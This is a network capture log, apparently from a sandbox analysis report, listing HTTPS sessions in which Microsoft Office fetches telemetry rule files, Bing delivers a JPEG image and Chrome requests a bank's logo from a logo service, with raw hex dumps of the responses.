                                                                          2024-12-08 19:51:20 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          65192.168.2.44982813.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:19 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:20 UTC471INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:20 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 407
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                          ETag: "0x8DC582B9698189B"
                                                                          x-ms-request-id: c753bf19-701e-0050-46aa-496767000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195120Z-r1cf579d778pftsbhC1EWRa0gn00000000t0000000006rkq
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_MISS
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:20 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          66192.168.2.44982913.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:19 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:20 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:20 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 486
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                          ETag: "0x8DC582B9018290B"
                                                                          x-ms-request-id: 22943564-b01e-0021-0b03-48cab7000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195120Z-r1cf579d778lntp7hC1EWR9gg400000005pg0000000072sq
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:20 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          67192.168.2.449830150.171.27.10443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:20 UTC375OUTGET /th?id=OADD2.10239385875220_1FZJ7DDRUSKY0IVFA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: tse1.mm.bing.net
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:20 UTC854INHTTP/1.1 200 OK
                                                                          Cache-Control: public, max-age=2592000
                                                                          Content-Length: 501573
                                                                          Content-Type: image/jpeg
                                                                          X-Cache: TCP_HIT
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Headers: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Timing-Allow-Origin: *
                                                                          Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                          NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: 4F47E369C14E44CCBD807B39E5F5BE3E Ref B: EWR30EDGE0818 Ref C: 2024-12-08T19:51:20Z
                                                                          Date: Sun, 08 Dec 2024 19:51:19 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:20 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 13 6e 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 36 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 38 3a 31 34 20 30 38 3a 32 35 3a 34 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                          Data Ascii: JFIF``nExifMM*bj(1r2i``Adobe Photoshop 24.6 (Windows)2023:08:14 08:25:428
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: c4 56 51 da 9c a2 9d b6 9c ab 4c 2c 22 0a 91 79 a5 51 f2 d3 95 7d 29 dc 9b 0f 40 36 d2 b2 52 a2 91 52 28 aa 52 33 6b 52 06 1f 37 34 ab 52 ba 53 55 08 aa ba 21 a6 35 97 35 14 91 d5 ad 99 a3 cb f9 aa f9 ac 66 e2 67 3c 59 a6 18 88 ad 4f 2b 34 7d 9f 35 5c c6 7c a8 cd f2 06 da 46 87 d2 b4 d6 0a 72 db 83 4f 9c 5c a8 c8 f2 29 be 41 ad 7f b3 d1 f6 5a 39 c7 ca 65 f9 38 a9 63 8a af 0b 6f 5a 7a db e2 97 39 4a 05 64 8a a6 8e 2a b1 1c 35 37 93 fe cd 4f b4 41 ec d9 59 61 cd 39 60 c5 5a 11 54 c9 10 2b 47 b4 17 21 45 62 3b aa 58 e3 21 b3 56 5a 13 bb 85 a7 c7 17 ad 3f 68 4f b3 62 42 08 a9 d0 7c d4 a9 1e 6a c2 45 4d 4c 87 4c 92 db ee e2 af 5b 03 bb 35 4f cb 29 cd 5f b3 23 6a d5 73 99 4a 06 95 b6 4a f3 56 12 12 5a 92 c1 01 55 3d ab 52 de 34 6e 94 73 d8 e6 94 6c 52 4b 7c 54
                                                                          Data Ascii: VQL,"yQ})@6RR(R3kR74RSU!55fg<YO+4}5\|FrO\)AZ9e8coZz9Jd*57OAYa9`ZT+G!Eb;X!VZ?hObB|jEMLL[5O)_#jsJJVZU=R4nslRK|T
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: ba b4 db d2 bb 29 e2 13 12 81 87 e5 0d d9 a9 ed a1 dc d4 b3 40 e8 d9 a9 ec 54 9e 69 d4 9d d1 d1 04 c9 e1 87 6f f0 d5 88 62 cf 4a 96 dd 32 be f5 72 de 1a f3 aa 54 36 0b 35 75 ad 7b 1c 95 e6 aa db c5 57 ed 57 0b 5c 53 95 d9 33 d8 98 26 69 1a 1c 55 84 51 4e 60 4d 41 cb ce ca 5e 4f bd 1e 4f fb 35 a0 91 06 5a 73 42 2a 6c 1e dc cf 8e 32 2a 4f 2b da ad 79 15 2c 70 8e 94 ac c9 75 91 52 18 fe 6a b4 91 0a 95 61 c5 4a 89 47 2b 39 e7 56 e4 2b 1e 2a 65 4a 95 12 a5 8e 3a 14 59 cf 2a 84 42 3a 95 13 e5 c5 48 b1 d3 d6 33 5b c2 36 31 75 2e 40 b1 d3 d1 70 d5 23 2e 29 6b 45 a1 3c d7 23 61 48 cb 53 2a d2 ed cd 55 89 e6 20 5c 8a 91 4d 3b 65 2e da b5 70 72 4c 55 3f 35 4f 0e 3b d4 41 00 a9 12 b6 83 31 96 a5 85 18 e9 4c 6e 29 e8 32 b4 c9 01 db 5b 37 a1 8a dc 63 91 4c 6c 52 e0 fa
                                                                          Data Ascii: )@TiobJ2rT65u{WW\S3&iUQN`MA^OO5ZsB*l2*O+y,puRjaJG+9V+*eJ:Y*B:H3[61u.@p#.)kE<#aHS*U \M;e.prLU?5O;A1Ln)2[7cLlR
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: 5f f8 15 57 59 16 ac c2 d1 b7 06 75 ae fa 35 27 27 6e 7f cb f5 30 9c 52 e8 38 6a 38 ff 00 9e 82 9d fd a5 9f e2 6f f8 12 d4 b1 da c7 27 fc bc ad 29 d3 a2 ef 26 7f e0 35 e8 aa 58 e6 ae a5 a7 af fc 13 0e 6a 3d 51 08 d4 3f dd 6a 72 dd c5 22 ed 65 6a 6b d8 db ff 00 79 69 a7 4f 88 fd d6 5f c2 b1 6b 1a bb 3f b8 af dc bf 21 5b c8 3f c4 cb 51 b2 45 ff 00 3d 96 92 4b 22 bd 37 55 79 2d dd 79 fd e7 fd f3 5c 35 bd a2 f8 a9 fe 66 91 51 7f 68 98 c3 19 ff 00 96 cb 4d 6b 71 d9 a3 6a ae fb c5 45 e6 b8 eb ba bc e9 d6 87 58 9b 2a 72 e8 c9 e4 81 fb 2c 7f f7 d5 41 24 12 8f f9 66 b4 a0 c6 dd 6e 95 7e ab 4e 0b 01 6f f8 fe 5a e7 6d 3d bf 34 5a 6d 6e ff 00 02 bb 46 e3 83 1e da 63 46 0f fb 35 a2 b0 db b7 fc be ff 00 df 34 1b 48 9b a5 c3 37 fc 06 b3 94 27 e5 f7 a2 95 64 b7 32 da dd
                                                                          Data Ascii: _WYu5''n0R8j8o')&5Xj=Q?jr"ejkyiO_k?![?QE=K"7Uy-y\5fQhMkqjEX*r,A$fn~NoZm=4ZmnFcF54H7'd2
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: 81 9b 98 f6 6a 6b 35 31 8d 35 9a ad 40 cd cc 73 3d 23 49 4c 63 4d cf bd 57 21 2e a5 87 ef a3 7d 33 9a 33 ef 55 c8 67 ed 07 33 1a 46 73 4d 63 8e b4 de b4 f9 45 ed 85 66 a3 75 1b 69 8d 8a 39 51 1e d1 8e df 46 fa 8f ad 25 3e 54 1e d4 95 5e 8d d5 0e 69 f8 f9 69 72 a0 8d 56 39 9a 9b be 86 06 9a c3 14 d4 43 9c 76 fa 46 7a 66 1a 8d a6 9f 29 3e d1 a1 59 f3 48 cd 45 36 84 91 9b a9 2e e3 b7 66 8a 45 e2 95 aa ac 85 cc d8 9c d2 f3 47 34 da 2c 27 26 c7 73 4c ce 29 76 d2 6d a7 ca 2b 89 9f 7a 16 9d 8f 4a 5c 53 b3 0b 88 a2 97 a5 39 45 0c 28 b0 86 51 4e c2 d2 3d 00 26 7d e8 cf bd 18 6a 55 5a a1 5c 65 1c d3 d8 63 ad 31 88 aa 48 4d 88 dc 52 31 a1 a8 51 56 a2 67 7e c2 73 4e 51 9a 17 14 b9 f7 a7 66 2b 8d a5 5a 55 5f 9a 9c ab 4e c2 b8 8a 0d 3d 45 2a ad 28 1b 69 02 d4 29 dc d1
                                                                          Data Ascii: jk515@s=#ILcMW!.}33Ug3FsMcEfui9QF%>T^iirV9CvFzf)>YHE6.fEG4,'&sL)vm+zJ\S9E(QN=&}jUZ\ec1HMR1QVg~sNQf+ZU_N=E*(i)
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: 31 77 bb 25 d1 ef 6d 2c f5 4d d7 1b 95 5b fe 5a 2e 7e 5f a8 1d 45 5c d4 3c 4b 69 15 e2 c7 a7 ed 9c f5 66 6c aa fe 15 cc df b6 e6 6a a3 1b e2 eb 27 e5 3b ab ba 14 54 95 c9 a9 2f 7d 1e 99 a3 ea 76 97 be 58 46 db 33 af cc 8a a5 b6 fe 35 62 fb 64 4d f3 ff 00 df 35 c0 c7 71 2c 4c 92 47 23 29 5f ee fc b5 ab 6f ab 4e b2 27 9f 27 99 1f f1 6e ae 49 51 71 77 46 8e 17 56 37 50 87 66 29 4e 60 11 77 9f 94 55 37 6c 6d 9e 36 e1 bf 89 5b e5 a6 34 f2 15 54 2c cc 17 fb d5 d3 1d 51 e7 ca 2d 4a c4 fa 93 81 6e a0 37 de fe 25 6a af 1d d4 7f 67 6f 33 76 e5 ff 00 c7 aa 37 39 fe 1a 63 2f cd 9a b8 dd 30 94 62 d5 99 24 37 71 bb 62 45 f2 cf f7 bf 86 ae 37 97 1e dd cd f7 b9 5a cb 92 3c f2 29 10 91 5d 49 b6 8e 49 45 26 69 b4 b6 ea b9 dd f7 bf 86 ab 3c 8e d2 67 ee 8f f6 6a 35 73 51 cd
                                                                          Data Ascii: 1w%m,M[Z.~_E\<Kiflj';T/}vXF35bdM5q,LG#)_oN''nIQqwFV7Pf)N`wU7lm6[4T,Q-Jn7%jgo3v79c/0b$7qbE7Z<)]IIE&i<gj5sQ
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: b8 ff 00 78 d2 ba 42 17 3e 57 f1 7b d2 b0 2b f2 09 69 bb c0 5e 57 77 e7 48 43 26 48 ca f1 13 2f fb 4a c7 fa d3 ed da cc 6d f9 5b 3f de 6f 9a 96 12 7c cd e2 2d a3 fd ed d4 f5 32 9e 63 65 63 fd d5 53 43 7a 58 2d 70 fd d8 56 3e 52 b6 ef f6 4d 22 14 66 e1 55 47 5f 9b e6 a7 23 38 6f 9d 59 4d 48 bb 1b 6e 1b fe 03 51 7b 07 28 e8 64 9f f8 17 e5 ff 00 74 62 86 48 dd bc d7 89 57 e6 fb cb 4e 44 08 b9 48 bf ef a6 a7 47 2f ca a0 ab 2f fb ac 6b 3d ca 50 b9 0b db 47 23 65 17 69 5f f6 82 b5 21 87 6f 58 96 4d bf de 6f 9a ac f9 e8 bb 87 de 3f ed 61 a9 11 cf df 78 3e 55 6f ba bf c5 f8 50 a5 24 8b d1 22 ab 32 47 b8 6d 68 f7 7f 7a 95 5f e5 c0 58 db fb cc bf 2f f3 ab 13 45 1b ab 6c f3 17 77 de 56 f9 95 68 8e ca 01 f7 1b 6b 7e 3b 7f 5a ae 75 6b b2 5b 6c a5 1b cf 14 9b 02 ae 16
                                                                          Data Ascii: xB>W{+i^WwHC&H/Jm[?o|-2cecSCzX-pV>RM"fUG_#8oYMHnQ{(dtbHWNDHG//k=PG#ei_!oXMo?ax>UoP$"2Gmhz_X/ElwVhk~;Zuk[l
                                                                          2024-12-08 19:51:21 UTC16067INData Raw: 32 5f 98 47 0a 9a f8 8a 17 9a bf 93 ba 3f dd ee dd f3 32 c6 3e 5f ca b3 ee 75 9b 86 e4 5c b2 8f fa 66 a1 7f 4a ea ec 6e b5 8b e8 d6 3d 43 43 d1 34 70 dc 46 97 2b 19 6f a2 a8 e4 9f ad 49 aa ff 00 6c c7 32 4f 69 a7 e8 52 79 5f c4 f1 c7 1f 1d f3 92 41 ad 63 9c c2 2f 95 d3 57 ff 00 12 fc f6 35 fa ba b1 c2 be af fb bd a1 ae d9 9b ee b3 37 cb 51 0b cd 61 db 11 c0 d2 6e fe 2d a5 ab a4 bf f1 0f 89 dd 67 7b 9d 0f c3 ba 64 71 a8 db e6 2a 3f 98 4f 7c a8 63 50 6c 69 6d 57 ed de 2f 82 d8 4a a5 f6 c0 c1 07 e4 f8 24 fe 15 d4 b3 66 96 b4 d7 df cd ff 00 a4 a0 f6 3a d8 e7 1a 4b dd cc 92 ae d2 bf c3 b7 77 f3 a1 2d ef 5d 7c c3 a7 dc b0 fb ca de 41 55 fe 55 d0 59 cf 71 05 d2 c7 a0 78 9e e6 fa 66 e5 51 6d 92 67 c0 ea 78 6e 2b 6d fc 41 67 67 a3 db 5e 6b 7a 85 dc b7 32 a9 32 79
                                                                          Data Ascii: 2_G?2>_u\fJn=CC4pF+oIl2OiRy_Ac/W57Qan-g{dq*?O|cPlimW/J$f:Kw-]|AUUYqxfQmgxn+mAgg^kz22y
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: fa 81 5b 12 68 d7 d7 4b e7 ff 00 c2 2f e5 8b a5 cc 72 c8 db 37 7f bb 18 23 19 1e d5 8b 7f e1 2d 57 4b 5f b5 cb 6d 68 c2 4c bf fa f1 bd 40 e3 a1 c0 cd 77 61 fe aa e6 9d 59 5e 5b 2b b5 f8 25 a2 2a 35 2f a1 96 ba 9d fc 90 cf 78 34 cf 2e 36 6f de 4a b1 fa 70 07 3d ab 5f c2 77 9a b9 d3 de e1 20 df e6 49 96 da ab bb db 68 eb 50 ad ee 9e da 7f d9 f5 49 64 59 95 46 e6 8a 4d df 27 a6 38 19 ac 35 d5 a5 86 69 62 b0 dd 05 bc 8d f7 7e f6 ec 74 cd 7a 12 a5 ed a2 e2 a1 6f 50 b2 b6 8c ef 74 5b 2b 4b db cf b4 de 34 cb 27 98 76 c0 ab be 4f c7 b0 fc e9 9a e6 89 a5 ee 98 cf 04 68 79 dd fb cc 96 27 9f 5c 0c 57 0f 67 ae 6a f6 d7 8b 71 6f 73 e5 9e 7f dd e7 82 6a d4 97 e4 ed fb 44 ed 2e ef 93 64 7f 2a e3 d4 67 d6 b9 5e 06 bc 6a 73 29 e9 e4 67 2b a2 db db 5e 43 63 26 9f a5 7e fe
                                                                          Data Ascii: [hK/r7#-WK_mhL@waY^[+%*5/x4.6oJp=_w IhPIdYFM'85ib~tzoPt[+K4'vOhy'\WgjqosjD.d*g^js)g+^Cc&~
                                                                          2024-12-08 19:51:21 UTC16384INData Raw: b2 6b b3 0b 85 95 ff 00 75 4e c9 7f 5a 7f 98 3b bd 4d 27 88 cd 24 66 79 19 06 d3 f2 70 cf 9c e0 74 e4 56 ee 93 14 1a 9d ab 5b 6a 13 db 41 a7 d8 a6 24 8d a6 dd 34 dd 7e 63 d8 31 ae 67 4a d1 7c 40 d2 31 2c b0 4b 3a 03 e4 36 5a 46 1d b2 3b 55 cb 84 d6 e1 b3 91 0e 94 cc bd 59 a2 db b9 b0 73 fe 78 ad ab 42 32 f7 23 35 7f 5d 88 49 dc bb 71 a7 68 f2 c8 c9 a6 5c dd ac 71 e0 2a ee dc 9b c8 ea 7f 95 73 7e 20 b2 d7 2c d6 29 66 68 5a 28 79 f3 62 6d ad 83 fa d7 4b e1 df 0c 79 b6 29 36 a1 ac 49 6f 75 79 97 4b 44 52 ee a3 fd b0 3a 1f ad 57 d6 bc 1c 93 ab b4 1a 85 f3 49 13 61 56 78 02 27 1e a4 9c fe 94 51 c4 53 a7 57 95 ce eb cd 7e a0 9b 23 b3 5d 1b fb 36 0b 9d 4a f1 a4 9a 45 03 66 ef 91 72 78 cf 4f d6 af eb 71 e9 f0 d8 c0 b6 76 be 5b 44 db fc f5 c2 b6 4f 19 00 76 ae 5e
                                                                          Data Ascii: kuNZ;M'$fyptV[jA$4~c1gJ|@1,K:6ZF;UYsxB2#5]Iqh\q*s~ ,)fhZ(ybmKy)6IouyKDR:WIaVx'QSW~#]6JEfrxOqv[DOv^


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          68192.168.2.44983113.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:21 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:22 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:22 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 469
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                          ETag: "0x8DC582BBA701121"
                                                                          x-ms-request-id: 3bfd724e-501e-0016-6705-48181b000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195122Z-r1cf579d778dc6d7hC1EWR2vs800000006xg000000005p5m
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:22 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          69192.168.2.44983213.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:22 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:22 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:22 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 415
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                          ETag: "0x8DC582BA41997E3"
                                                                          x-ms-request-id: 1f14184f-601e-0050-3802-482c9c000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195122Z-r1cf579d778dndrdhC1EWR4b2400000005yg000000003vfz
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          70192.168.2.44983513.227.8.654431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:22 UTC356OUTGET /virginmoney.com HTTP/1.1
                                                                          Host: logo.clearbit.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
